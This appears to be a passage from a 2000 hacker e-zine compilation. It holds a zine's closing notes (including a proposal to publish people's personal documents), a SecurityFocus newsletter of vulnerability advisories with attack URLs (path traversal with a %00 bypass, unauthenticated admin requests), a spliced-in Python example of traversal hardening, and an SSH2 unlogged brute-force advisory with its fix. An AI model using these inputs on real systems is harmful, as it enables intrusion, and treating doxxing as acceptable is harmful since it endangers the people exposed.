Well, after all, that's the first issue of PURSUiT, so we have no news to talk about, so we will use this space for ideas, future features and other things.

Stuff we had in mind:
---------------------

1. Lamer list

This was the idea of one of us, just to take out rage on people that keep on bugging us, or just for the fun of it. If we include it in the future, I believe it won't be serious, just to have some laughs the night after it on IRC ;)

2. Shouts

It's my idea mostly, though I think it won't be included. If it is, we will probably use it to thank people who helped putting out the zine, reviewed it, made some corrections etc.

3.
Docs exposing

Now this idea came through an anonymous source, which suggested that PURSUiT could drop docs of a few people here and then. The people we had in mind are mostly the ones that everyone hates (I won't declare them here :) but we first need to get the docs, so it might not go.

4. Questions\Answers section

This is mostly self-explanatory: a section or column where people will be able to email us and we will answer the question in the zine, so that other people can know the answer too. If we get enough response for that, we might do it.

That's it for now. If you have other suggestions, ideas, or features you believe we should include, just email us at:

bxj   -
f0bic -

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Well, we all hope you enjoyed the first issue of PURSUiT. Remember, you can always catch us on IRC, or email us.

EOF

@HWA

115.0 SecurityFocus.com Newsletter 33
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SecurityFocus.com, the premier security information portal, has a completely new look and more in-depth security content! As part of our new site we have a free service which allows Solaris users to determine their security posture; take a look at:

http://www.securityfocus.com/sun/vulncalc

SecurityFocus.com - It's all here and it's all free.

I. FRONT AND CENTER
  1. Info.Sec.Radio to interview head of Technical Security Branch of Canada's Federal Police Force, the RCMP.
II. BUGTRAQ SUMMARY
  1. Linux atsar Input Validation Vulnerability
  2. RealServer Internal IP Address Disclosure Vulnerability
  3. NT Automated Tasks / Drive Mappings Vulnerability
  4.
Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability
  5. Sojourn File Access Vulnerability
  6. Oracle Web Listener Batch File Vulnerability
  7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
  8. Microsoft SQL Weak Password Encryption Vulnerability
  9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability
  10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
  1. The Coming Linux Plague (March 13, 2000)
  2. The Fine Print in UCITA (March 16, 2000)
  3. Sex Site Billing Companies Targeted By Russian Cybercrime (March 13, 2000)
  4. Information Freedom Catching On (March 16, 2000)
  5. Vast online credit card theft revealed (March 17, 2000)
  6. Hacker Finds a New Home for Stolen Cards (March 17, 2000)
IV. INCIDENTS SUMMARY
  1. Munged Napster Sessions (Thread)
  2. Undernet/telnet attempts? (Thread)
  3. Strange RPC? service entries. (Thread)
  4. ingreslock message (Thread)
  5. lots of interest in port 109 (POP2) (Thread)
  6. Mail and web server attack (Thread)
  7. Firewall (Thread)
  8. TCP port 3218 (Thread)
  9. Odd UPD scan (Thread)
  10. DUP packet replies at tvguide.com (Thread)
  11. Cracked; rootkit - entrapment question? (Thread)
  12. pop-2 scanning (Thread)
  13. Looking for Squid Proxies (Thread)
  14. TCP port 3218 (Thread)
  15. what are these? (Thread)
V. VULN-DEV RESEARCH LIST SUMMARY
  1. Unwanted automagic processing (Thread)
  2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
  3. Hotline (Thread)
  4. Crashing Win9x (Thread)
  5. NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread)
  6. Crashing Win9x with smbclient (Thread)
  7. Intel Corporation, Express 550 (Thread)
  8. spoofing the ethernet address (Thread)
  9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
  10. Exploiting any network protocol with secondary data channels (Thread)
  11. Buffer overflow in AIM 3.5.1856 (Thread)
VI. SECURITY JOBS
VII. SECURITY SURVEY RESULTS
  1.
Which remote accessing service presents the greatest security risks?
VIII. SECURITY FOCUS TOP 6 TOOLS
  1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
  2. SecurityFocus.com Pager (Win95/98/NT)
  3. Cold Fusion Scan 1.0 (Win95/98/NT)
  4. Atlas 1.0 (Win95/98)
  5. kfirewall 0.4.2 (Linux)
  6. cgi scanner 3.6 (UNIX/PERL)
IX. SPONSOR INFORMATION - SecurityFocus.com
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION

I. FRONT AND CENTER
-------------------

1. Info.Sec.Radio to interview head of Technical Security Branch of Canada's Federal Police Force, the RCMP

The show airs on Monday March 20 at 10am PST, 11am MST, 1pm EST.

http://www.securityfocus.com/radio/

II. BUGTRAQ SUMMARY 2000-03-13 to 2000-03-20
---------------------------------------------

1. Linux atsar Input Validation Vulnerability
BugTraq ID: 1048
Remote: No
Date Published: 2000-03-11
Relevant URL: http://www.securityfocus.com/bid/1048
Summary:

atsar is a Linux load monitoring software package released under the GPL by AT Computing. atsadc is a setuid root binary that is included in the atsar package. atsadc will accept as an argument an output file, which it will open -- without checking to make sure the user executing atsadc has the privileges to do so. After it has opened and created (or overwritten) the target file as root, the permissions set on the file will allow the attacker to write to it. Since this file is arbitrary, it is possible to gain root locally in any number of ways through creating malicious system files. In Teso's proof of concept exploit, root privileges are gained by creating a malicious shared library to be preloaded and creating/specifying that library in /etc/ld.so.preload (and then executing a setuid binary..).

2. RealServer Internal IP Address Disclosure Vulnerability
BugTraq ID: 1049
Remote: Yes
Date Published: 2000-03-08
Relevant URL: http://www.securityfocus.com/bid/1049
Summary:

By default, Real Server includes the IP address of the server in data sent to the client.
If the Real Server is installed on a machine in a NAT environment (where requests from the outside network are handled by a reverse proxy), this will reveal what are supposed to be private, hidden IP addresses.

3. NT Automated Tasks / Drive Mappings Vulnerability
BugTraq ID: 1050
Remote: No
Date Published: 2000-03-14
Relevant URL: http://www.securityfocus.com/bid/1050
Summary:

Any automated task that relies on mapped drives and runs at a higher privilege level than the logged-on user can be exploited by changing the drive mapping. By replicating the directory structure of the intended drive, and replacing the contents of the scheduled executables or configuration files with other data, it is possible for a local attacker to cause arbitrary code to be executed at an elevated privilege level.

For example: \\Workstation has the following drive mapping: S: \\Server\Scripts, and there is an AT job that runs S:\Daily.bat every day as the Local Administrator. Now all the attacker has to do is replace the S: mapping with one that specifies a target where the attacker has write privileges (\\Workstation\C$ for example). Then if the batch file C:\Daily.bat is created, it will be run as Local Administrator.

4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability
BugTraq ID: 1051
Remote: Yes
Date Published: 2000-03-14
Relevant URL: http://www.securityfocus.com/bid/1051
Summary:

Atrium Software Mercur is an SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists within the login command, causing the application to crash if a string consisting of over 3000 characters is used as a username. This affects both the POP3 and IMAP server in the Mercur mail server suite.

5. Sojourn File Access Vulnerability
BugTraq ID: 1052
Remote: Yes
Date Published: 2000-03-14
Relevant URL: http://www.securityfocus.com/bid/1052
Summary:

Any file that the webserver has read access to can be read on a server running the Sojourn search engine.
The Sojourn software includes the ability to organize a website into categories. These categories can then be accessed via the sojourn.cgi Perl script. This is done by making a request for a URL like:

http://target/cgi-bin/sojourn.cgi?cat=categoryname

Each category has an associated .txt file based on the category name. The program appends the .txt extension onto the contents of the 'cat' variable. However, the program will accept and follow the '../' string in the variable contents, allowing read access to any .txt file the webserver can read. This restriction can be bypassed by appending %00 to the end of the requested file, which will prevent the .txt extension from being used in the filename.

6. Oracle Web Listener Batch File Vulnerability
BugTraq ID: 1053
Remote: Yes
Date Published: 2000-03-15
Relevant URL: http://www.securityfocus.com/bid/1053
Summary:

Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even necessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code.

7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
BugTraq ID: 1054
Remote: Yes
Date Published: 2000-03-11
Relevant URL: http://www.securityfocus.com/bid/1054
Summary:

A vulnerability exists in which Checkpoint Firewall-1 will expose internal addresses to machines outside the network. Under seemingly normal load conditions (according to the poster of this vulnerability, 40% CPU utilization with 200+ active connections), Firewall-1 will attempt to establish connections utilizing the internal address.
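Returning to the Sojourn entry (item 5) above: the two defects it describes, honouring '../' in the category name and letting a %00 cut the '.txt' suffix off, are the classic pair behind path-traversal file reads. The following is an added example, not Sojourn's code or SecurityFocus's, that reproduces the described behaviour in a few lines next to a hardened lookup; CATEGORY_DIR and the function names are this example's own assumptions.

```python
"""Added example (not Sojourn's code): the described 'cat' handling beside a
hardened version.  CATEGORY_DIR and all names here are constructed."""
import os
import re
from urllib.parse import unquote

CATEGORY_DIR = "/var/www/sojourn/categories"   # constructed location


def vulnerable_category_path(cat_param: str) -> str:
    """Behaviour the advisory describes: decode the query value, append '.txt',
    and hand the string to an open() that, being a C string underneath, stops
    at the first NUL byte.  Nothing checks that the result stays in the
    category directory, so '../' segments are honoured."""
    cat = unquote(cat_param)                    # '%00' decodes to a real NUL
    name = CATEGORY_DIR + "/" + cat + ".txt"
    name = name.split("\0", 1)[0]               # what a C-level open() sees
    return os.path.normpath(name)


class BadCategory(ValueError):
    """Raised by the hardened lookup for any name it refuses to serve."""


# Allow-list: a category name is a plain identifier and nothing else.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_category_path(cat_param: str) -> str:
    """Hardened lookup: reject NUL bytes, allow-list the name, then confirm the
    resolved path still lies inside CATEGORY_DIR."""
    cat = unquote(cat_param)
    if "\0" in cat or not _SAFE_NAME.fullmatch(cat):
        raise BadCategory("category name rejected: %r" % cat)
    base = os.path.realpath(CATEGORY_DIR)
    path = os.path.realpath(os.path.join(base, cat + ".txt"))
    # Belt and braces: even an allow-listed name must resolve under the base.
    if os.path.commonpath([base, path]) != base:
        raise BadCategory("path escapes category directory")
    return path


def is_rejected(cat_param: str) -> bool:
    """True if the hardened lookup refuses the name."""
    try:
        safe_category_path(cat_param)
    except BadCategory:
        return True
    return False


if __name__ == "__main__":
    for q in ("linux", "../../../../etc/hosts", "../../../../etc/hosts%00"):
        print("%-26s vulnerable -> %s" % (q, vulnerable_category_path(q)))
        print("%-26s hardened   -> %s" % (
            q, "rejected" if is_rejected(q) else safe_category_path(q)))
```

Run as a script it shows the three stages the advisory walks through: a plain name resolves to a file under the category directory, a traversal name escapes the directory but still carries the '.txt' suffix, and the same name with %00 loses the suffix entirely. The hardened version rejects both bad inputs before any path is built; the realpath check at the end is there so that a future relaxation of the allow-list cannot silently reintroduce the traversal.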
As this address is either non-routable or internal, a retransmission will occur; this packet will have the correct address rewritten, but will use the same source port. Using this information makes it easy to determine the firewall behind which this address resides, as well as the internal address of the machine being utilized to establish the connection being seen. This may be particularly useful to attackers conducting client-side attacks. These problems have been seen on both NT and Solaris versions of FW-1, although the poster indicated that not enough data was available to directly state the Solaris version was vulnerable in the same ways, or to the same degrees.

8. Microsoft SQL Weak Password Encryption Vulnerability
BugTraq ID: 1055
Remote: No
Date Published: 2000-03-14
Relevant URL: http://www.securityfocus.com/bid/1055
Summary:

If 'Always prompt for login name and password' is not set, and Windows Integrated Security is not being used, Enterprise Manager for SQL Server 7 will save the login ID and password in the registry key HKCU\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server X. The algorithm used to encrypt the password consists of XORing each character with a two-byte value dependent on the character's position in the string. If 'Always prompt for login name and password' is set, or Windows Integrated Security is used, the ID and password are not saved at all.

9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability
BugTraq ID: 1056
Remote: Yes
Date Published: 2000-03-16
Relevant URL: http://www.securityfocus.com/bid/1056
Summary:

WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser. Insufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash. eg.
http://target/&mail_user=

10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
BugTraq ID: 1057
Remote: Yes
Date Published: 2000-03-16
Relevant URL: http://www.securityfocus.com/bid/1057
Summary:

Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, the administrator is given the capability to manage the OfficeScan network through an HTML interface. This can be accessed by requesting the authentication form which is located at http://target/officescan/. It prompts the user for the admin password; however, it is transmitted in plaintext, which can be intercepted by any user on the network running a packet sniffer specifically searching for the string "TMLogon=".

A larger problem exists in that any user with access to the web server is able to perform administrative functions without any sort of authorization simply by requesting specific URLs. This is accomplished by requesting certain CGI files such as jdkRqNotify.exe. A request for jdkRqNotify.exe in conjunction with a domain name on the network and an administrative event code number would allow any user on the network to perform certain administrative duties. eg.

http://target/officescan/cgi/jdkRqNotify.exe?domain=&event=

Examples of event code numbers are:

  11: Scan now
  12: Uninstall
  14: Roll back
  15: New alert message
  16: New intranet proxy
  17: New privilege
  18: New protocol
  19: New password
  20: New client

III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
--------------------------------------------

1. The Coming Linux Plague (March 13, 2000)
URL: http://www.securityfocus.com/commentary/2

2. The Fine Print in UCITA (March 16, 2000)
URL: http://www.securityfocus.com/commentary/4

3.
Sex Site Billing Companies Targeted By Russian Cybercrime (March 13, 2000)
URL: http://www.securityfocus.com/news/3

4. Information Freedom Catching On (March 16, 2000)
URL: http://www.securityfocus.com/news/5

5. Vast online credit card theft revealed (March 17, 2000)
URL: http://www.msnbc.com/news/382561.asp

6. Hacker Finds a New Home for Stolen Cards (March 17, 2000)
URL: http://www.internetnews.com/ec-news/article/0,1087,4_323241,00.html

IV. INCIDENTS SUMMARY
----------------------

1. Munged Napster Sessions (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314021712.CF91B106FB@schadenfreude.meshuggeneh.net

2. Undernet/telnet attempts? (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=75B741AEA780D3118D6500508B4499A001965C75@cadillac.office.wxs.nl

3. Strange RPC? service entries. (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313095534.5770.0@argo.troja.mff.cuni.cz

4. ingreslock message (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=38CD2727.26D3F760@RZ.RWTH-Aachen.DE

5. lots of interest in port 109 (POP2) (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313205308.24475.qmail@securityfocus.com

6. Mail and web server attack (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314135432.1709.qmail@securityfocus.com

7. Firewall (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=Pine.GUL.4.21.0003142235580.21371-100000@red1.cac.washington.edu

8. TCP port 3218 (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314232752.A6369@stwing.upenn.edu

9.
Odd UPD scan (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=BC60D9A2A99CD311BB6B009027B09D2F02CE85@sea1sa02.punchnetworks.com

10. DUP packet replies at tvguide.com (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=200003151649.LAA18294@granger.mail.mindspring.net

11. Cracked; rootkit - entrapment question? (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=D6C7B533F7C4D311BBD800001D121E7F0152D9@clmail.cmccontrols.com

12. pop-2 scanning (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=20000315192246.524.qmail@securityfocus.com

13. Looking for Squid Proxies (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=200003161445.GAA01133@cwsys.cwsent.com

14. TCP port 3218 (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316120331.G.E.Fowler@lboro.ac.uk

15. what are these? (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316232929.djk@tobit.co.uk

V. VULN-DEV RESEARCH LIST SUMMARY
---------------------------------

1. Unwanted automagic processing (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=12UQKA-0005iM-00@gate.westel900.hu

2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=JEENLNLIMOLKDGAHKOCHEEPODAAA.marc@eeye.com

3. Hotline (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBJPBMKLJJBCHBNEAIOEIGCCAA.jlintz@optonline.net

4. Crashing Win9x (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315085426.29030.cpmta@c008.sfo.cp.net

5.
NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBIKOFOLKHBDNJIAKCEEJJCCAA.mrousseau@secured.org

6. Crashing Win9x with smbclient (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315104542.B28738@trillian.adap.org

7. Intel Corporation, Express 550 (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.LNX.4.10.10003151605360.32739-100000@inetarena.com

8. spoofing the ethernet address (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.GSO.4.21.0003151412230.21920-100000@campus

9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D169B5.5B1E1727@nitnet.com.br

10. Exploiting any network protocol with secondary data channels (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D1FECA.6954A347@enternet.se

11. Buffer overflow in AIM 3.5.1856 (Thread)
URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D52362.D0B1AEF2@rit.edu

VI. SECURITY JOBS SUMMARY 2000-03-13 to 2000-03-20
---------------------------------------------------

This section is unavailable this week - missed entries will be included in next week's 'week in review'.

VII. SECURITY SURVEY 2000-03-13 to 2000-03-20
-----------------------------------------------

Which remote accessing service presents the greatest security risks?

  RPC/DCOM               21% / 34 votes
  Web (including CGI)    28% / 45 votes
  SSH                     2% /  4 votes
  FTP                     5% /  8 votes
  NFS/NETBIOS            20% / 32 votes
  Telnet (incoming)      20% / 32 votes

  Total number of votes: 156 votes

VIII. SECURITY FOCUS TOP 6 TOOLS 2000-03-13 to 2000-03-20
--------------------------------------------------------

1.
ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
by RedShadow
Relevant URL: http://www.rsh.kiev.ua

Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner, Tracert, Telnet, Nslookup, Finger, Echo, Time, UPD test, File Info, Compare File, Netstat, SysInfo, Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info.
Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack (definitions of the password by a method of search), Unix password Crack, Finger over SendMail, Buffer Overflow, Smb Password Check, CRK Files.
ShadowPortGuard - code for detection of connection on a certain port.
Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x.
And more other functions.

2. SecurityFocus.com Pager (Win95/98/NT)
by SecurityFocus.com
Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip

This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable).

3. Cold Fusion Scan 1.0 (Win95/98/NT)
by icos@arez.com
Relevant URL: http://www.securityfocus.com/data/tools/cfscan.zip

Cold Fusion vulnerability scanner is a program that will run down a list of words/domain names, and scan each one for an Allaire Cold Fusion misconfiguration.

4. Atlas 1.0 (Win95/98)
by Digital Monkey, dmonkey@arctik.com
Relevant URL: http://www.securityfocus.com/data/tools/Atlas.zip

A Windows/MS-DOS CGI scanner (binary only) which scans for 65 remote vulnerabilities.

5.
kfirewall 0.4.2 (Linux)
by Kim Andre Norheim, kim-nor@online.no
Relevant URLS:
http://www.securityfocus.com/data/tools/kfirewall-0.4.2.tar.gz
http://megaman.ypsilonia.net/kfirewall/

kfirewall is a GUI front end for ipchains or ipfwadm (depending on your kernel version); in version 0.4.0 ipfwadm support was removed. You can quickly and easily protect your computer against attacks and block ports. kfirewall is easy and fast to use.

6. cgi scanner 3.6 (UNIX/PERL)
by CKS
Relevant URLS:
http://www.securityfocus.com/data/tools/auditing/network/cgichk3_6.tgz
http://www.singnet.com.sg/~cksss/

Cgi Scanner 3.6 is a simple program which facilitates the scanning of hosts on a network for known cgi vulnerabilities. Upon finding a given cgi program, the script will optionally download information from the author's web page, detailing the exploit. 3.6 includes a fix for a y2k problem in previous versions that would cause numerous false positives.

IX. SPONSOR INFORMATION - SecurityFocus.com
--------------------------------------------

SecurityFocus.com, the premier security information portal, has a new look and more in-depth security content. Check out our redesigned site and new Solaris Focus Area. Get the latest info on securing the Solaris OS--news, vulnerabilities, white papers--in one, easy-to-navigate area. Click the Solaris tab on the home page. SecurityFocus.com-It's all here and it's all free.

X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------

1. How do I subscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBSCRIBE SF-NEWS Lastname, Firstname

You will receive a confirmation request message to which you will have to answer.

2. How do I unsubscribe?

Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of:

UNSUBSCRIBE SF-NEWS

If your email address has changed, email aleph1@securityfocus.com and I will manually remove you.

3. How do I disable mail delivery temporarily?
If you are simply going on vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command:

SET SF-NEWS NOMAIL

To turn e-mail delivery back on use the command:

SET SF-NEWS MAIL

4. Is the list available in a digest format?

Yes. The digest is generated once a day.

5. How do I subscribe to the digest?

To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with a message body of:

SET SF-NEWS DIGEST

6. How do I unsubscribe from the digest?

To turn the digest off send a message to LISTSERV with a message body of:

SET SF-NEWS NODIGEST

If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.

7. I seem to not be able to unsubscribe. What is going on?

You are probably subscribed from a different address than the one from which you are sending commands to LISTSERV. Either send email from the appropriate address or email the moderator to be unsubscribed manually.

Alfred Huger
VP of Engineering
SecurityFocus.com

@HWA

116.0 You can get into trouble for hacking!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece comes from the Dept of Justice website, quite amusing actually..

Submitted by Sugarking

http://www.usdoj.gov/kidspage/do-dont/reckless.htm

YOU CAN GET IN REAL TROUBLE FOR HACKING!

Some kids think they can't get into trouble for hacking computer systems and that hacking big networks like the phone company, the military, or NASA is harmless fun. But that's not true, as one teenager in Boston found out recently.

The hacker and some of his friends found a way to hack into a computer that belongs to the phone company and that directs telephone traffic in the Boston area. After he got into the system, the hacker decided to reboot the computer, which basically made it crash.
The first time he did this, the hacker completely shut off phone service for six hours to a regional airport so that the air traffic control tower had an extremely hard time communicating. The second time he crashed the computer, he cut off phone service to about 600 homes.

The phone company reported this to the United States Secret Service, which investigated the case and identified all the kids involved. Although the Justice Department does not prosecute juveniles very often, the United States Attorney's Office in Boston charged the ringleader of the group with several serious crimes. Even though the student won't go to jail, he did receive very serious punishment: he lost his computer, must pay $5000 to the telephone company, and must work in the community for free for 250 hours. He will also be on probation for the next two years, and during that time he is not allowed to use any computer with a modem. That means, of course, that he is off the Internet and all other networks.

DON'T LET THIS HAPPEN TO YOU!

If you think about it, it's pretty easy to see why this student got into so much trouble. How would you feel if you were one of the 600 houses that lost phone service? What if you needed to call 911? How would you feel if you had been flying into the airport that lost telephone service?

The best way to stay out of trouble with computers is to imagine before you do something how you'd feel if someone did it to you. You wouldn't like it if someone opened your mail or looked into your bedroom windows, and if you wouldn't do this either, don't hack into computers.

Lots of kids know enough about computers to hack into big networks, but so what? It doesn't mean you're smart, it just means you don't mind hurting other people--because it does hurt them. People are not going to want to hire you to protect computers if you've been a hacker. It's a question of trust, not skill.
If you like computers, don't use your brains to hack systems, invade other people's privacy, and take away their networks. Hacking can get you in a whole lot more trouble than you think and is a completely creepy thing to do. If you're so smart, use that computer to do great things!

@HWA

117.0 SSHD v2.0.11< (old) Watch your version numbers!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: (Bugtraq Archives)
http://msgs.securepoint.com/cgi-bin/get/bugtraq9905/75.html

Yes this IS old. But it's here because recently someone was upgrading from using ssh1 to ssh2 and almost installed an older version, thinking that any ssh2 implementation was secure (no names *wink*), so I've put this here to remind people that knew and advise those that were unaware of the possible threat... - Ed

Forum: BUGTRAQ (Admin)
Date: 1999, May 13
From: Patrick Oonk

Found this at http://www.jjf.org/advisory/SshdJJFen.txt

- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 05/09/1999
Release: 05/14/1999
Author: Zhodiac
URL: http://www.jjf.org
Application: sshd2 up to 2.0.11
OS: Unix
Risk: Risky :), long term could gain system access.

-=-=-=-=-=-=-=-=
 Introduction
-=-=-=-=-=-=-=-=

In the default installation of sshd2 (up to 2.0.11) there is an open way to bruteforce a login/password, without any kind of ip logging by the sshd. Version 2.0.12 and newer seem not to be vulnerable to this attack, because they log the ip at connection time.

-=-=-=-=-=-=-=-=
 Details
-=-=-=-=-=-=-=-=

When a ssh client connects to the daemon, it has a number (default is three) of attempts to guess the correct password before disconnecting. If we shut down the connection before using up the number of attempts, the daemon will log neither the connection, nor the password guesses, nor the ip of the client.

One crystal clear example:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
Disconnected; authentication error.
[zhodiac@piscis zhodiac]$

In /var/log/messages:

May 9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')'

Now we try the bug:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$

Those "FATAL: Received signal 2." are the response to interrupting the program with a ^C. Let's see what syslog did:

May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.

No ip, no password guess attempts in the logs! So a bruteforce can be done without any kind of logging...

Sorry script-kiddies, no program available!

-=-=-=-=-=-=-=-=
 Quick Fix
-=-=-=-=-=-=-=-=

Edit the file sshd2_config (usually at /etc/ssh2) and set the value of "PasswordGuesses" to 1. With this, each time a password is tried it will be logged in the following way:

May 9 12:46:07 piscis sshd[1308]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1527', requested service 'ssh-connection')'

It is also recommended to set the value of "ListenAddress" so we will have more control of which ips can use our ssh service.

A better solution is to upgrade to version 2.0.12 or newer; with them, at connection time it will log via syslog in the following way:

May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
zhodiac@jjf.org
http://www.jjf.org
- J.J.F.
/ Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

--
Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
Pine Internet B.V. Consultancy, installation and management
Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
--
Pine Security Digest - http://security.pine.nl/ (Dutch)
----
Excuse of the day: Feature was not beta tested

@HWA

118.0 BBC:"Outdoing the hackers"
~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by MerXor
Source: http://news2.thls.bbc.co.uk/hi/english/business/newsid%5F689000/689285.stm

Friday, 24 March, 2000, 18:02 GMT
Outdoing the hackers
By BBC News Online's Iain Rodger

Imagine a team of people spending all their time thinking up ways of hacking into corporate computer networks. Now imagine them, Mission Impossible-style, breaking into the inner sanctum itself - the main computer room.

